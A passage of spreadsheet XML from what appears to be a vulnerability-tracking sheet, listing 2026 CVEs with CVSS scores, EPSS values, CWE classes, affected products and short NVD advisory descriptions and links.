      <c r="L2816" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M2816" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77898</t>
        </is>
      </c>
    </row>
    <row r="2817">
      <c r="A2817" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2817" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78071</t>
        </is>
      </c>
      <c r="C2817" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2817" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2817" s="5" t="inlineStr"/>
      <c r="F2817" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2817" s="5" t="inlineStr"/>
      <c r="H2817" s="5" t="inlineStr"/>
      <c r="I2817" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2817" s="5" t="inlineStr"/>
      <c r="K2817" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2817" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - digital-peak.com - Authenticated, privileged stored XSS in DP Calendar 7.0.0-8.19.5, 9.0.0-10.12.0 - Location title is rendered in data attribute without escaping leads to XSS, needs create permission in DPCalendar.</t>
        </is>
      </c>
      <c r="M2817" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78071</t>
        </is>
      </c>
    </row>
    <row r="2818">
      <c r="A2818" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2818" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78130</t>
        </is>
      </c>
      <c r="C2818" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2818" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2818" s="5" t="inlineStr"/>
      <c r="F2818" s="5" t="inlineStr"/>
      <c r="G2818" s="5" t="inlineStr"/>
      <c r="H2818" s="5" t="inlineStr"/>
      <c r="I2818" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2818" s="5" t="inlineStr"/>
      <c r="K2818" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2818" s="5" t="inlineStr">
        <is>
          <t>strongSwan 4.2.0 through 6.0.7 has a NULL pointer dereference in the x509 plugin's attribute certificate parser.</t>
        </is>
      </c>
      <c r="M2818" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78130</t>
        </is>
      </c>
    </row>
    <row r="2819">
      <c r="A2819" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2819" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78132</t>
        </is>
      </c>
      <c r="C2819" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2819" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2819" s="5" t="inlineStr"/>
      <c r="F2819" s="5" t="inlineStr"/>
      <c r="G2819" s="5" t="inlineStr"/>
      <c r="H2819" s="5" t="inlineStr"/>
      <c r="I2819" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2819" s="5" t="inlineStr"/>
      <c r="K2819" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="L2819" s="5" t="inlineStr">
        <is>
          <t>strongSwan 5.1.3 through 6.0.7 has an infinite loop in the x509 plugin's attribute certificate parser for ietfAttrSyntax.</t>
        </is>
      </c>
      <c r="M2819" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78132</t>
        </is>
      </c>
    </row>
    <row r="2820">
      <c r="A2820" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2820" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78133</t>
        </is>
      </c>
      <c r="C2820" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2820" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2820" s="5" t="inlineStr"/>
      <c r="F2820" s="5" t="inlineStr"/>
      <c r="G2820" s="5" t="inlineStr"/>
      <c r="H2820" s="5" t="inlineStr"/>
      <c r="I2820" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2820" s="5" t="inlineStr"/>
      <c r="K2820" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2820" s="5" t="inlineStr">
        <is>
          <t>libcharon in strongSwan 6.0.0 through 6.0.7 has a use-after-free in IKEv2 rekeying collision handling.</t>
        </is>
      </c>
      <c r="M2820" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78133</t>
        </is>
      </c>
    </row>
    <row r="2821">
      <c r="A2821" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2821" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78480</t>
        </is>
      </c>
      <c r="C2821" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2821" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2821" s="5" t="inlineStr"/>
      <c r="F2821" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2821" s="5" t="inlineStr"/>
      <c r="H2821" s="5" t="inlineStr"/>
      <c r="I2821" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2821" s="5" t="inlineStr"/>
      <c r="K2821" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L2821"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M2821" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78480</t>
        </is>
      </c>
    </row>
    <row r="2822">
      <c r="A2822" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2822" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78490</t>
        </is>
      </c>
      <c r="C2822" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2822" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2822" s="5" t="inlineStr"/>
      <c r="F2822" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2822" s="5" t="inlineStr"/>
      <c r="H2822" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2822" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2822" s="5" t="inlineStr"/>
      <c r="K2822" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="L2822" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Restriction of Excessive Authentication Attempts vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to client-side request forgery.</t>
        </is>
      </c>
      <c r="M2822" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78490</t>
        </is>
      </c>
    </row>
    <row r="2823">
      <c r="A2823" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2823" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78523</t>
        </is>
      </c>
      <c r="C2823" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2823" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2823" s="5" t="inlineStr"/>
      <c r="F2823" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G2823" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2823" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I2823" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2823" s="5" t="inlineStr"/>
      <c r="K2823" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2823" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2823" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78523</t>
        </is>
      </c>
    </row>
    <row r="2824">
      <c r="A2824" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2824" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78543</t>
        </is>
      </c>
      <c r="C2824" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2824" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2824" s="5" t="inlineStr"/>
      <c r="F2824" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2824" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2824" s="5" t="inlineStr">
        <is>
          <t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t>
        </is>
      </c>
      <c r="I2824" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2824" s="5" t="inlineStr"/>
      <c r="K2824" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="L2824" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 could allow a remote attacker to cause a denial of service due to an infinite loop.</t>
        </is>
      </c>
      <c r="M2824" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78543</t>
        </is>
      </c>
    </row>
    <row r="2825">
      <c r="A2825" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2825" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78574</t>
        </is>
      </c>
      <c r="C2825" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2825" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2825" s="5" t="inlineStr"/>
      <c r="F2825" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2825" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H2825" s="5" t="inlineStr"/>
      <c r="I2825" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2825" s="5" t="inlineStr"/>
      <c r="K2825" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="L2825" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M2825" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78574</t>
        </is>
      </c>
    </row>
    <row r="2826">
      <c r="A2826" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2826" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78837</t>
        </is>
      </c>
      <c r="C2826" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2826" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2826" s="5" t="inlineStr"/>
      <c r="F2826" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2826" s="5" t="inlineStr"/>
      <c r="H2826" s="5" t="inlineStr"/>
      <c r="I2826" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2826" s="5" t="inlineStr"/>
      <c r="K2826" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L2826" s="5" t="inlineStr">
        <is>
          <t>A SQL injection vulnerability in the ap_form_{id} parameter in AppNitro MachForm v30 allows attackers to access sensitive database information via a crafted SQL statement.</t>
        </is>
      </c>
      <c r="M2826" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78837</t>
        </is>
      </c>
    </row>
    <row r="2827">
      <c r="A2827" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2827" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79323</t>
        </is>
      </c>
      <c r="C2827" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2827" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2827" s="5" t="inlineStr"/>
      <c r="F2827" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2827" s="5" t="inlineStr"/>
      <c r="H2827" s="5" t="inlineStr">
        <is>
          <t>mageplaza:magefan_blog</t>
        </is>
      </c>
      <c r="I2827" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2827" s="5" t="inlineStr"/>
      <c r="K2827" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2827" s="5" t="inlineStr">
        <is>
          <t>Information disclosure in the blogComments GraphQL query in Magefan Blog GraphQL for Magento 2 (magefan/module-blog-graph-ql) through 2.2.1 allows remote unauthenticated attackers to obtain blog commenter email addresses and internal customer and admin identifiers via a POST request to /graphql.</t>
        </is>
      </c>
      <c r="M2827" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79323</t>
        </is>
      </c>
    </row>
    <row r="2828">
      <c r="A2828" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2828" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79324</t>
        </is>
      </c>
      <c r="C2828" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2828" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2828" s="5" t="inlineStr"/>
      <c r="F2828" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2828" s="5" t="inlineStr"/>
      <c r="H2828" s="5" t="inlineStr">
        <is>
          <t>mageplaza:gdpr</t>
        </is>
      </c>
      <c r="I2828" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2828" s="5" t="inlineStr"/>
      <c r="K2828" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L2828" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in the Address Delete controller in Mageplaza GDPR for Magento 2 (mageplaza/module-gdpr) through 4.2.9 allows remote unauthenticated attackers to delete any customer's saved address, and to erase all stored addresses by iterating the address id, via a GET request to /customer/address/delete/id/{id}. The controller extends the legacy Action class instead of AbstractAccount, so no authentication, ownership or form key check is enforced.</t>
        </is>
      </c>
      <c r="M2828" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79324</t>
        </is>
      </c>
    </row>
    <row r="2829">
      <c r="A2829" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2829" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79377</t>
        </is>
      </c>
      <c r="C2829" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2829" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2829" s="5" t="inlineStr"/>
      <c r="F2829" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2829" s="5" t="inlineStr"/>
      <c r="H2829" s="5" t="inlineStr"/>
      <c r="I2829" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2829" s="5" t="inlineStr"/>
      <c r="K2829" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2829" s="5" t="inlineStr">
        <is>
          <t>A heap overflow in the a2dp_decoder_sbc.cpp component of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t>
        </is>
      </c>
      <c r="M2829" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79377</t>
        </is>
      </c>
    </row>
    <row r="2830">
      <c r="A2830" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2830" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79378</t>
        </is>
      </c>
      <c r="C2830" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2830" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2830" s="5" t="inlineStr"/>
      <c r="F2830" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2830" s="5" t="inlineStr"/>
      <c r="H2830" s="5" t="inlineStr"/>
      <c r="I2830" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2830" s="5" t="inlineStr"/>
      <c r="K2830" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2830" s="5" t="inlineStr">
        <is>
          <t>An issue in the btm_acl_handle() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t>
        </is>
      </c>
      <c r="M2830" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79378</t>
        </is>
      </c>
    </row>
    <row r="2831">
      <c r="A2831" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2831" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79390</t>
        </is>
      </c>
      <c r="C2831" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2831" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2831" s="5" t="inlineStr"/>
      <c r="F2831" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2831" s="5" t="inlineStr"/>
      <c r="H2831" s="5" t="inlineStr"/>
      <c r="I2831" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2831" s="5" t="inlineStr"/>
      <c r="K2831" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L2831" s="5" t="inlineStr">
        <is>
          <t>Trueview TI8161 6.0.23.4 is vulnerable to information disclosure due to the transmission of MQTT communications in plaintext over TCP port 1883. An unauthenticated attacker with access to the same network segment can intercept MQTT traffic and obtain sensitive device information and operational data, including device identifiers, message metadata, and control-related information.</t>
        </is>
      </c>
      <c r="M2831" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79390</t>
        </is>
      </c>
    </row>
    <row r="2832">
      <c r="A2832" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2832" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79407</t>
        </is>
      </c>
      <c r="C2832" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2832" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2832" s="5" t="inlineStr"/>
      <c r="F2832" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2832" s="5" t="inlineStr"/>
      <c r="H2832" s="5" t="inlineStr"/>
      <c r="I2832" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2832" s="5" t="inlineStr"/>
      <c r="K2832" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2832" s="5" t="inlineStr">
        <is>
          <t>A path traversal vulnerability in the SPO extension of MetaGPT 0.8.1 allows an attacker to read arbitrary files via the FILE_NAME value used by set_file_name() and load_meta_data() in metagpt/ext/spo/utils/load.py. The vulnerable code joins the attacker-controlled FILE_NAME value with the settings directory and opens the resulting path without validating that the resolved path remains within the intended directory.</t>
        </is>
      </c>
      <c r="M2832" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79407</t>
        </is>
      </c>
    </row>
    <row r="2833">
      <c r="A2833" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2833" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79572</t>
        </is>
      </c>
      <c r="C2833" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2833" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2833" s="5" t="inlineStr"/>
      <c r="F2833" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2833" s="5" t="inlineStr"/>
      <c r="H2833" s="5" t="inlineStr"/>
      <c r="I2833" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2833" s="5" t="inlineStr"/>
      <c r="K2833" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="L2833" s="5" t="inlineStr">
        <is>
          <t>An XXE (XML External Entity) vulnerability in the level-rule module of Distribution Management v1.0.0 allows attackers to read sensitive files, scan internal networks, or launch server attacks via supplying a crafted XML payload.</t>
        </is>
      </c>
      <c r="M2833" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79572</t>
        </is>
      </c>
    </row>
    <row r="2834">
      <c r="A2834" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2834" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79575</t>
        </is>
      </c>
      <c r="C2834" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2834" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2834" s="5" t="inlineStr"/>
      <c r="F2834" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2834" s="5" t="inlineStr"/>
      <c r="H2834" s="5" t="inlineStr"/>
      <c r="I2834" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2834" s="5" t="inlineStr"/>
      <c r="K2834" s="5" t="inlineStr">
        <is>
          <t>CWE-330</t>
        </is>
      </c>
      <c r="L2834" s="5" t="inlineStr">
        <is>
          <t>The JWT signing secret in yfexam-exam v2.0 is derived from the username and the current month instead of a random server-side key, making the secret key easily obtainable via a bruteforce attack.</t>
        </is>
      </c>
      <c r="M2834" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79575</t>
        </is>
      </c>
    </row>
    <row r="2835">
      <c r="A2835" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2835" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79641</t>
        </is>
      </c>
      <c r="C2835" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2835" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2835" s="5" t="inlineStr"/>
      <c r="F2835" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2835" s="5" t="inlineStr"/>
      <c r="H2835" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2835" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2835" s="5" t="inlineStr"/>
      <c r="K2835" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2835"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elevation of privileges.</t>
        </is>
      </c>
      <c r="M2835" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79641</t>
        </is>
      </c>
    </row>
    <row r="2836">
      <c r="A2836" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2836" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79734</t>
        </is>
      </c>
      <c r="C2836" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2836" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2836" s="5" t="inlineStr"/>
      <c r="F2836" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2836" s="5" t="inlineStr"/>
      <c r="H2836" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2836" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2836" s="5" t="inlineStr"/>
      <c r="K2836" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2836"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M2836" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79734</t>
        </is>
      </c>
    </row>
    <row r="2837">
      <c r="A2837" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2837" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79738</t>
        </is>
      </c>
      <c r="C2837" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2837" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2837" s="5" t="inlineStr"/>
      <c r="F2837" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2837" s="5" t="inlineStr"/>
      <c r="H2837" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2837" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2837" s="5" t="inlineStr"/>
      <c r="K2837" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L2837"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M2837" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79738</t>
        </is>
      </c>
    </row>
    <row r="2838">
      <c r="A2838" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2838" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79740</t>
        </is>
      </c>
      <c r="C2838" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2838" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2838" s="5" t="inlineStr"/>
      <c r="F2838" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2838" s="5" t="inlineStr"/>
      <c r="H2838" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2838" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2838" s="5" t="inlineStr"/>
      <c r="K2838" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L2838"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M2838" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79740</t>
        </is>
      </c>
    </row>
    <row r="2839">
      <c r="A2839" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2839" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79950</t>
        </is>
      </c>
      <c r="C2839" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2839" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2839" s="5" t="inlineStr"/>
      <c r="F2839" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2839" s="5" t="inlineStr"/>
      <c r="H2839" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2839" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2839" s="5" t="inlineStr"/>
      <c r="K2839" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L283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M2839" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79950</t>
        </is>
      </c>
    </row>
    <row r="2840">
      <c r="A2840" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2840" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80123</t>
        </is>
      </c>
      <c r="C2840" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2840" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2840" s="5" t="inlineStr"/>
      <c r="F2840" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2840" s="5" t="inlineStr"/>
      <c r="H2840" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I2840" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2840" s="5" t="inlineStr"/>
